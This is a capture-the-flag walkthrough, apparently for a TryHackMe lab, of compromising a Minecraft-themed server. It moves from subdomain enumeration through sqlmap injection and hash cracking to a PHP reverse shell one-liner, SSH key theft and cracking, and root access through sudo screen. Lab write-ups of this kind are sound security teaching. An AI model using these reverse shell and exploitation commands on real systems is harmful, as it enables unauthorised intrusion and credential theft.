This room is about cracking a Minecraft server So lovely :D


First, I added the ip to my /etc/hosts file:

sudo echo " cybercrafted.thm" | sudo tee -a /etc/hosts

Then I performed an Nmap scan:

nmap -sC -T4 -p- > sC.txt
Starting Nmap 7.94SVN ( ) at 2024-05-27 12:01 UTC
Nmap scan report for cybercrafted.thm (
Host is up (0.056s latency).
Not shown: 65532 closed tcp ports (conn-refused)
22/tcp    open  ssh
| ssh-hostkey: 
|   2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
|   256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_  256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp    open  http
|_http-title: Cybercrafted
25565/tcp open  minecraft
Nmap done: 1 IP address (1 host up) scanned in 19.71 seconds

Then I went to take a look to the webpage and its code:

I found something interesting inside the web code:

<!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! -->

So itโ€™s time to subdomain enumeration!

wfuzz -c -z file,'/usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt' -u "http://cybercrafted.thm" -H "Host:FUZZ.cybercrafted.thm" --hw 65 > wfuzz_results.txt
# Results
000000001:   200        34 L     71 W       832 Ch      "www" 
000000024:   200        30 L     64 W       937 Ch      "admin"
000000081:   403        9 L      28 W       287 Ch      "store"
000000290:   200        30 L     64 W       937 Ch      "www.admin"
000000689:   400        10 L     35 W       301 Ch      "gc._msdcs"

So I searched for the admin subdomain (remember to add it to the /etc/hosts):

I tried some common combinations but none worked, so itโ€™s time for more enumeration!:

dirsearch -u http://admin.cybercrafted.thm
# Found this subdirectory

So I performed a more detailed scan again:

dirsearch -e php,html,js -u http://admin.cybercrafted.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-files.tx
# Found nothing
# Tried the next one
dirsearch -e php,html,js -u http://admin.cybercrafted.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-words.txt

As nothing was found I tried the other subdomain store, which had a 403 error:

dirsearch -e php,html,js -u http://store.cybercrafted.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-words.txt
# Found nothing
# Tried this one:
dirsearch -e php,html,js -u http://store.cybercrafted.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt

As I wasnโ€™t finding nothing, I tried to use gobuster

gobuster dir -u http://store.cybercrafted.thm/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt --no-error -t 100 -x php
# Found
/search.php           (Status: 200) [Size: 838]

It seems like a web to find items, so Iโ€™ll try some SQLi

Capturing the request with Burp I produced a 500 error:

So itโ€™s time to use Sqlmap with that request:

sqlmap -r req.txt -p 'search' --level=3 --risk=3 --batch --dbs --dump --threads 3 


We also found the hash of the user, so we can go to and decrypt it:

Now we can login to the previously discovered admin suibdomain:

Now I could obtain a reverse shell with:

php -r '$sock=fsockopen("",666);exec("/bin/sh -i <&3 >&3 2>&3");'

Now I found and encrypted id_rsa on the .ssh directory:

So Iโ€™ll copy it to my machine and bruteforce it:

python3 -m http.server:8090 #on the victim's machine
wget http://cybercrafted.thm:8090/id_rsa # on my machine

Now Iโ€™ll crack it with John:

ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
creepin2006      (id_rsa)  

So now weโ€™ve got the ssh password for the user xxultimatecreeperxx.

To get the minecraft server flag we can do:

find / -name "minecraft_server_flag.txt" 2>/dev/null

Now we run the command id to check our groups and privileges:

uid=1001(xxultimatecreeperxx) gid=1001(xxultimatecreeperxx) groups=1001(xxultimatecreeperxx),25565(minecraft)

Now we can to what weโ€™ve got access with group minecraft:


We found the other userโ€™s password!:

Now we can get the user flag:

Now we run sudo -l to see capabilities:

Now I run this:

sudo -u root /usr/bin/screen -r cybercrafted
# The press Ctrl + A + C

Weโ€™ve got the root flag :D

Machine pwned